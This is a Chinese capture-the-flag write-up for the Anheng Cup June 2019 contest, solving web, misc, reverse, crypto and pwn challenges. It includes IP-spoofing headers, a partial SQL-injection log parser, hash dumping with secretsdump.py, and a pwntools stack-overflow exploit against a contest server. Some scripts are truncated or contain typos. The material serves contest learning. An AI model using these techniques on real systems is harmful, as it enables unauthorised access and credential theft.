题目链接:
https://github.com/Dong555/Anheng_cup_month/tree/master/2019-06
目录
Web
- 0x01 Web1
Misc
- 0x01 简单的日志分析
- 0x02 我的密码
Reverse
- 0x01 又是crackme
- 0x02 re你快乐吗
Crypto
- 0x01 石头剪子布
- 0x02 你认识我吗
Pwn
- 0x01 魔法,为我而存在
正文
Web
0x01 Web1
这题好坑啊,试了以下所有:
Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
并且加上了 host:127.0.0.1 就是没有试localhost,我错了
image
Misc
0x01 简单的日志分析
延时注入的acces日志分析,失败的字符如下图所示:
image
成功的字符如下图所示:
image
写代码分析一下更快速,只写了一部分:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
ACCESS_LOG_FILE = 'file'
def ch164(fp):
flag = [[0,0,0,0,0,0,0,0] for i in range(38)]
b64 = []
with open(fp, 'r') as f:
for line in f:
line = line.strip()
if len(line) == 0: continue
if 'f1ag' not in line: continue
p = line.split(' ')
0x02 我的密码
使用 secretsdump.py 来获取用户的hash密码,到在线网站进行解密,得到最后结果为123qwe
image
image
Reverse
0x01 又是crackme
在OD中动态调试可得:
image
0x02 re你快乐吗
迷宫题,把迷宫画出来走就完事了:
maze = [0x00, 0x8,0x1,0xe,0xb,0x7,0x10,0x1,0xb,0xf,0xf,0x1,0x1,0x9,0x1,0x1,0x1,0x1,0x1,0x1,0xb,0x1,0xc,0xc,0x8,0xe,0x1,0x8,0x1,0x8,0x1,0x1,0xc,0x9,0xe,0x1,0xd,0x8,0xb,0x1,0x1,0x1,0x1,0x1,0x1,0x9,0xa,0x9,0x9,0x63,0x0,0x0,0x0]
for i in range(1, len(maze)):
print("{:02x}".format(maze[i]), end = " ")
if i % 7 == 0:
print()
image
Crypto
0x01 石头剪子布
每轮次出的是固定的,只需要记录20次,就可以获得完整的字符串,之后直接解栅栏密码。
image
脚本如下:
#coding:utf-8
from pwn import *
import re
context.log_level='debug'
p=remote("101.71.29.5",10013)
p.recvuntil("(1)")
flag=''
def fun(x,flag):
p.sendline(x)
res=p.recv()
print res
res=re.findall(r"<< (.*) >>",res)[0]
return res
p.recvuntil("=============================\n")
a=[2,1,1,2,0,0,0,1,2,2,1,0,1,2,0,1,2,1,1,2]
for i in a:
res=fun(str(i),flag)
flag+=res
print flag
p.interactive()
image
0x02 你认识我吗
通过观察加密过程可以看出来这是一个简单的列替换密码,只需要在列上找到flag{,通过有意义的flag字符串拼凑就可以得到密钥
脚本如下:
a=["yostfYz","idihiaA","shlcg_g","nksiogm","knifn{a","tutnpfe","hlhstl_","Iotmysr","hauriA}","owceloi","utonaun"]
b='y o s t f Y z i d i h i a A s h l c g _ g n k s i o g m k n i f n { a t u t n p f e h l h s t l _ I o t m y s r h a u r i A } o w c e l o i u t o n a u n'
flag=''
c=[7,5,6,1,3,4,0,9,10,2,8]
for i in c:
print a[i]
for j in range(7):
for i in c:
s=a[i]
flag+=s[j]
print f
image
Pwn
0x01 魔法,为我而存在
漏洞在输入4后,进入的函数里read的字节超过了buf的长度导致了栈溢出,直接控制程序跳到题目预留的后门函数即可。
脚本如下:
from pwn import *
context.log_level='debug'
context.terminal=["tmux","splitw","-h"]
p=remote("101.71.29.5",10001)
elf=ELF('./magicc')
cat_addr=0x080485A7
p.recvuntil("Choose!\n")
p.sendline('4')
p.recvuntil("You are one step short of success\n")
paylaod='a'*22 + p32(cat_addr)
p.sendline(paylaod)
p.interactive()
image